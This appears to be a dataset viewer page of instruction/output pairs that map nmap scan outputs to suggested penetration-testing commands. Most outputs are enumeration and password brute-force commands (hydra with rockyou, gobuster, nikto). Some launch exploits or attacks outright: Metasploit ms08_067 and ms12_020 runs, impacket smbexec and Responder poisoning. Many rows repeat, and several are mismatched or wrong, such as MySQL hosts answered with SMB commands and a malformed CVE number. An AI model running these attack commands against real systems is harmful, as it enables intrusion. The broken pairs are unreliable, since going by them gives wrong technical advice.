Dataset Viewer
instruction
stringlengths 39
233
| input
stringclasses 1
value | output
stringlengths 56
213
|
|---|---|---|
Host is up (0.0010s latency).
PORT STATE SERVICE
80/tcp open http
443/tcp open https
|
nikto -h http://192.168.1.10
dirb http://192.168.1.10
wpscan --url https://192.168.1.10 --enumerate p
|
|
Host is up (0.0025s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
3306/tcp open mysql
|
hydra -l root -P /path/to/wordlist.txt ssh://192.168.1.20
nmap --script=ftp-anon.nse -p 21 192.168.1.20
mysql -h 192.168.1.20 -u root -p
|
|
Host is up (0.0030s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
443/tcp open https Apache httpd 2.4.29
8080/tcp open http-proxy Squid http proxy 3.5.27
|
nikto -h http://192.168.1.30
gobuster dir -u http://192.168.1.30 -w /path/to/wordlist.txt
nmap --script=http-headers -p 80,443 192.168.1.30
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE
443/tcp open https
|
openssl s_client -connect 192.168.1.40:443
nikto -h https://192.168.1.40
nmap --script ssl-enum-ciphers -p 443 192.168.1.40
|
|
Host is up (0.0025s latency).
PORT STATE SERVICE
53/tcp open domain
|
dnsrecon -d example.com -t axfr -n 192.168.1.50
nmap --script=dns-zone-transfer -p 53 192.168.1.50
dig @192.168.1.50 example.com AXFR
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|
hydra -l admin -P /path/to/wordlist.txt ftp://192.168.1.60
nmap --script ssh-brute -p 22 192.168.1.60
nikto -h http://192.168.1.60
|
|
Host is up (0.0031s latency).
PORT STATE SERVICE
8080/tcp open http-proxy
8000/tcp open http-alt
|
gobuster dir -u http://192.168.1.70:8080 -w /path/to/wordlist.txt
nmap --script=http-vuln-cve2014-0160 -p 8080 192.168.1.70
dirb http://192.168.1.70:8000
|
|
Host is up (0.0042s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
|
nmap --script=ms-sql-info -p 1433 192.168.1.80
sqlmap -u "http://192.168.1.80" --dbs
hydra -l sa -P /path/to/wordlist.txt mssql://192.168.1.80
|
|
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|
ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
PORT STATE SERVICE
445/tcp open microsoft-ds
|
smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス>
|
|
PORT STATE SERVICE
21/tcp open ftp
|
ftp <IPアドレス>
hydra -l anonymous -P /usr/share/wordlists/rockyou.txt ftp://<IPアドレス>
nmap --script ftp-anon.nse -p21 <IPアドレス>
|
|
PORT STATE SERVICE
3306/tcp open mysql
|
mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス>
|
|
PORT STATE SERVICE
25/tcp open smtp
|
telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
msfconsole -q -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <IPアドレス>; run"
|
|
PORT STATE SERVICE
53/tcp open domain
|
dig @<IPアドレス> example.com axfr
dnsrecon -d example.com -t axfr
host example.com <IPアドレス>
|
|
PORT STATE SERVICE
3389/tcp open ms-wbt-server
|
rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス>
|
|
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
|
smbclient //10.10.10.5/share
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス>
|
|
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|
nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
sslscan https://<IPアドレス>]
|
|
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|
ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|
telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
5000/tcp open upnp Portable SDK for UPnP devices (Linux)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|
curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
curl --proxy <IP>:8080 http://example.com
gobuster dir --proxy <IP>:8080 --url=http://example.com
nikto --proxy=http://<ip>:8080 --host=http://example.com
|
|
PORT STATE SERVICE VERSION
111/tcp open rpcbind
2049/tcp open nfs_acl
80/tcp open http
443/tcp open ssl/http
|
showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
|
|
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian (protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
ssh user@<IPアドレス>
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows XP microsoft-ds
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|
smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
msfconsole -q -x "use exploit/windows/smb/ms08_067_netapi; set RHOSTS <IPアドレス>; run"
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.29
|
mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス>
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|
ftp <IPアドレス>
nmap --script ftp-anon.nse -p21 <IPアドレス>
hydra -l anonymous -P /usr/share/wordlists/rockyou.txt ftp://<IPアドレス>
|
|
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|
telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス>
|
|
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.13 (Ubuntu Linux)
|
dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス>
|
|
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|
rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス>
|
|
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
curl --proxy <IP>:8080 http://example.com
gobuster dir --proxy <IP>:8080 --url=http://example.com
nikto --proxy=http://<ip>:8080 --host=http://example.com
|
|
PORT STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8)
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu (protocol 2.0)
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
2222/tcp open ssh OpenSSH (protocol 2.0)
|
ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
111/tcp open rpcbind
2049/tcp open nfs_acl
80/tcp open http
443/tcp open ssl/http
|
showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip>
|
|
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
22/tcp open ssh OpenSSH (protocol 2.0)
|
ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios Microsoft Windows netbios
445/tcp open smb Microsoft Windows SMB
|
smbclient //10.x.x.x/share
enum4linux <ip address>
/opt/impacket/examples/smbclient.py <ip address>
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
22/tcp open ssh OpenSSH (protocol v2)
|
/opt/impacket/examples/mysqlclient.py root:<password>@<ip address>
|
|
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
22/tcp open ssh OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0)
|
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ssh user@<IPアドレス>
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
ftp <IPアドレス>
nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
|
smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス>
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.29
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス>
|
|
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd
|
telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス>
|
|
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3 (Ubuntu Linux)
80/tcp open http Apache httpd
|
dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス>
|
|
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス>
|
|
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
curl --proxy <IP>:8080 http://example.com
gobuster dir --proxy <IP>:8080 --url=http://example.com
nikto --proxy=http://<ip>:8080 --host=http://example.com
|
|
PORT STATE SERVICE VERSION
5000/tcp open Werkzeug Python web server (Flask)
80/tcp open Apache HTTPD
443/tcp open ssl/http Apache HTTPD
|
curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH (protocol v2)
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
2222/tcp open ssh OpenSSH (protocol v2)
|
ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
111/tcp open rpcbind
2049/tcp open nfs_acl
80/tcp open http
443/tcp open ssl/http
|
showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip>
|
|
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd v3.x.x
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios Microsoft Windows netbios
445/tcp open smb Microsoft Windows SMB
|
/opt/impacket/examples/smbclient.py //10.x.x.x/share
/opt/impacket/examples/rpcdump.py @10.x.x.x
/opt/impacket/examples/smbexec.py [email protected]
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
/opt/impacket/examples/smbclient.py //10.x.x.x/share
/opt/impacket/examples/rpcdump.py @10.x.x.x
/opt/impacket/examples/smbexec.py [email protected]
|
|
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
22/tcp open ssh OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0)
|
curl http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ssh user@<IPアドレス>
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
ftp <IPアドレス>
nikto -h http://<IPアドレス>
gobuster dir -u http://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
|
smbclient -L //<IPアドレス>/
enum4linux <IPアドレス>
crackmapexec smb <IPアドレス>
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.29
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
mysql -h <IPアドレス> -u root -p
nmap --script mysql-enum.nse -p3306 <IPアドレス>
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<IPアドレス>
|
|
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd
|
telnet <IPアドレス> 25
smtp-user-enum -M VRFY -U /usr/share/wordlists/usernames.txt -t <IPアドレス>
nmap --script smtp-enum-users.nse -p25 <IPアドレス>
|
|
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3 (Ubuntu Linux)
80/tcp open http Apache httpd
|
dig axfr @<IPアドレス> example.com
dnsrecon -d example.com -t axfr
host example.com <IPアドレス>
|
|
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
rdesktop <IPアドレス>
xfreerdp /v:<IPアドレス>
/opt/impacket/examples/rpcdump.py <IPアドレス>
|
|
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy
80/tcp open http Apache httpd
443/tcp open ssl/http Apache httpd
|
curl --proxy <IP>:8080 http://example.com
gobuster dir --proxy <IP>:8080 --url=http://example.com
nikto --proxy=http://<ip>:8080 --host=http://example.com
|
|
PORT STATE SERVICE VERSION
5000/tcp open Werkzeug Python web server (Flask)
80/tcp open Apache HTTPD
443/tcp open ssl/http Apache HTTPD
|
curl http://<IPアドレス>:5000
nikto -h https://<IPアドレス>:5000
gobuster dir -u https://<IPアドレス>:5000 -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH (protocol v2)
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
2222/tcp open ssh OpenSSH (protocol v2)
|
ssh user@<IPアドレス> -p2222
curl https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
111/tcp open rpcbind
2049/tcp open nfs_acl
80/tcp open http
443/tcp open ssl/http
|
showmount -e <ip>
/opt/impacket/examples/rpcdump.py <ip>
nmap --script nfs-ls,nfs-statfs,nfs-showmount.nse -p2049 <ip>
|
|
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
telnet <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd v3.x.x
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
ftp <IPアドレス>
nikto -h https://<IPアドレス>
gobuster dir -u https://<IPアドレス> -w /usr/share/wordlists/dirbuster/directory-list-medium.txt
|
|
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios Microsoft Windows netbios
445/tcp open smb Microsoft Windows SMB
|
/opt/impacket/examples/smbclient.py //10.x.x.x/share
/opt/impacket/examples/rpcdump.py @10.x.x.x
/opt/impacket/examples/smbexec.py [email protected]
|
|
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL v5.x.x
80/tcp open http Apache HTTPD
443/tcp open ssl/http Apache HTTPD
22/tcp open ssh OpenSSH (protocol v2)
|
/opt/impacket/examples/smbclient.py //10.x.x.x/share
/opt/impacket/examples/rpcdump.py @10.x.x.x
/opt/impacket/examples/smbexec.py [email protected]
|
|
Host is up (0.0034s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-vsftpd-backdoor:
| Backdoor exists, send the command `USER anonymous`.
| Backdoor confirmed, exit with command `QUIT`.
|
hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.20
searchsploit vsftpd 2.3.4
nmap --script=ftp-vsftpd-backdoor -p 21 10.10.10.20
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
80/tcp open http Apache httpd 2.2.8
...
OS details: Linux 2.6.24 - 2.6.33
|
searchsploit metasploitable 2
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.30
hydra -l root -P /path/to/wordlist.txt ssh://10.10.10.30
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE
8443/tcp open https
| ssl-cert: Subject: commonName=Unifi Controller
|_ Issuer: commonName=Unifi
|
nikto -h https://10.10.10.40:8443
searchsploit unifi controller
gobuster dir -u https://10.10.10.40:8443 -w /path/to/wordlist.txt
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
|
hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.50
searchsploit proftpd 1.3.5
nmap --script=ftp-bounce -p 21 10.10.10.50
|
|
Host is up (0.0034s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server
| rdp-vuln-ms12-020:
| VULNERABLE: RDP vulnerability CVE-2012-020
| State: VULNERABLE
...
OS details: Microsoft Windows Server 2008 R2
|
msfconsole -q -x "use exploit/windows/rdp/ms12_020_maxchannelids; set RHOST 10.10.10.60; run"
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.60
hydra -l Administrator -P /path/to/wordlist.txt rdp://10.10.10.60
|
|
Host is up (0.0021s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
139/tcp open netbios-ssn
445/tcp open microsoft-ds
OS details: Microsoft Windows Server 2012 R2
|
nmap --script=smb-os-fingerprint -p 445 10.10.10.70
crackmapexec smb 10.10.10.70 -u 'user' -p 'password'
hydra -l user -P /path/to/wordlist.txt rdp://10.10.10.70
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
445/tcp open microsoft-ds
OS details: Microsoft Windows XP SP2
|
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.80
searchsploit ms08-067
hydra -l Administrator -P /path/to/wordlist.txt smb://10.10.10.80
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29
OS details: Linux 4.15 - 5.0
|
nmap --script=ssh-brute -p 22 10.10.10.90
nikto -h http://10.10.10.90
gobuster dir -u http://10.10.10.90 -w /path/to/wordlist.txt
|
|
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.49
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|
nmap --script=http-vuln-cve2017-5638 -p 80 10.10.10.100
nikto -h http://10.10.10.100
gobuster dir -u http://10.10.10.100 -w /path/to/wordlist.txt
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| Backdoor exists, send the command `USER anonymous`.
| Backdoor confirmed, exit with command `QUIT`.
|
hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.130
nmap --script=ftp-vsftpd-backdoor -p 21 10.10.10.130
searchsploit vsftpd 2.3.4
|
|
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server
| rdp-vuln-ms12-020:
| VULNERABLE: RDP vulnerability CVE-2012-020
| State: VULNERABLE
...
OS details: Microsoft Windows Server 2008 R2
|
msfconsole -q -x "use exploit/windows/rdp/ms12_020_maxchannelids; set RHOST 10.10.10.140; run"
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.140
hydra -l Administrator -P /path/to/wordlist.txt rdp://10.10.10.140
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Debian 4ubuntu0.3
|
hydra -l user -P /path/to/wordlist.txt ssh://10.10.10.150
nmap --script=ssh-brute -p 22 10.10.10.150
searchsploit openssh 7.6
|
|
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|
nmap --script=http-vuln-cve2017-5638 -p 80 10.10.10.160
nikto -h http://10.10.10.160
gobuster dir -u http://10.10.10.160 -w /path/to/wordlist.txt
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.60-0+deb8u1
|
nmap --script=mysql-info -p 3306 10.10.10.170
mysql -u root -h 10.10.10.170 -p # パスワードがわかる場合
searchsploit mysql 5.5.60
|
|
Host is up (0.0021s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds
OS details: Microsoft Windows 10 Home Edition
|
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.180
smbclient -L //10.10.10.180 -U user
hydra -l user -P /path/to/wordlist.txt smb://10.10.10.180
|
|
Host is up (0.0023s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat 8.5.29
|
nmap --script=http-tomcat-users -p 8080 10.10.10.190
searchsploit apache tomcat 8.5.29
gobuster dir -u http://10.10.10.190:8080 -w /path/to/wordlist.txt
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
27017/tcp open mongodb 3.4.10
|
nmap --script=mongodb-databases -p 27017 10.10.10.200
mongo 10.10.10.200 --port 27017
searchsploit mongodb 3.4.10
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
1194/tcp open openvpn OpenVPN 2.4.7
|
nmap --script=openvpn-version -p 1194 10.10.10.210
searchsploit openvpn 2.4.7
hydra -l user -P /path/to/wordlist.txt openvpn://10.10.10.210
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE
8443/tcp open https
| ssl-cert: Subject: commonName=Unifi Controller
|_ Issuer: commonName=Unifi
|
nikto -h https://10.10.10.220:8443
gobuster dir -u https://10.10.10.220:8443 -w /path/to/wordlist.txt
searchsploit unifi controller
|
|
Host is up (0.0011s latency).
PORT STATE SERVICE
22/tcp open ssh OpenSSH 7.4
80/tcp open http Apache httpd 2.4.18
|
gobuster dir -u http://10.10.10.230 -w /path/to/wordlist.txt
searchsploit apache 2.4.18
hydra -l root -P /path/to/wordlist.txt ssh://10.10.10.230
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
139/tcp open netbios-ssn
|
responder -I eth0 # ネットワーク上でのLLMNR/NBNS/MDNSポイズニング
nmap --script=smb-vuln-ms17-010 -p 445 10.10.10.240
smbclient -L //10.10.10.240 -U guest
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25
|
nikto -h http://10.10.10.250
searchsploit apache 2.4.25
gobuster dir -u http://10.10.10.250 -w /path/to/wordlist.txt
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.31-0ubuntu0.18.04.1
|
nmap --script=mysql-info -p 3306 10.10.10.260
mysql -u root -h 10.10.10.260 -p # パスワードがわかる場合
searchsploit mysql 5.7.31
|
|
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29
OS details: Linux 4.15 - 5.0
|
nmap --script=ssh-brute -p 22 10.10.10.270
nikto -h http://10.10.10.270
gobuster dir -u http://10.10.10.270 -w /path/to/wordlist.txt
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Jenkins 2.150.1
|
nmap --script=jenkins-version -p 8080 10.10.10.280
searchsploit jenkins 2.150.1
gobuster dir -u http://10.10.10.280:8080 -w /path/to/wordlist.txt
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
6379/tcp open redis Redis 4.0.14
|
nmap --script=redis-info -p 6379 10.10.10.290
redis-cli -h 10.10.10.290
searchsploit redis 4.0.14
|
|
Host is up (0.0012s latency).
PORT STATE SERVICE VERSION
1194/tcp open openvpn OpenVPN 2.4.7
|
nmap --script=openvpn-version -p 1194 10.10.10.300
searchsploit openvpn 2.4.7
hydra -l user -P /path/to/wordlist.txt openvpn://10.10.10.300
|
|
Host is up (0.0031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38
| http-title: WordPress
|_ HTTP/1.1 200 OK
|
wpscan --url http://10.10.10.310 --enumerate u
searchsploit wordpress
gobuster dir -u http://10.10.10.310 -w /path/to/wordlist.txt
|
|
Host is up (0.0023s latency).
PORT STATE SERVICE VERSION
80/tcp open http Nginx 1.17.9
|
nikto -h http://10.10.10.320
searchsploit nginx 1.17.9
gobuster dir -u http://10.10.10.320 -w /path/to/wordlist.txt
|
|
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL 9.6.10
|
nmap --script=pgsql-info -p 5432 10.10.10.330
psql -h 10.10.10.330 -U postgres
searchsploit postgresql 9.6.10
|
|
Host is up (0.0011s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
|
hydra -l anonymous -P /path/to/wordlist.txt ftp://10.10.10.340
nmap --script=ftp-proftpd-backdoor -p 21 10.10.10.340
searchsploit proftpd 1.3.5
|
|
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 4.0.10
|
nmap --script=mongodb-databases -p 27017 10.10.10.350
mongo 10.10.10.350 --port 27017
searchsploit mongodb 4.0.10
|
End of preview. Expand
in Data Studio
No dataset card yet
- Downloads last month
- 1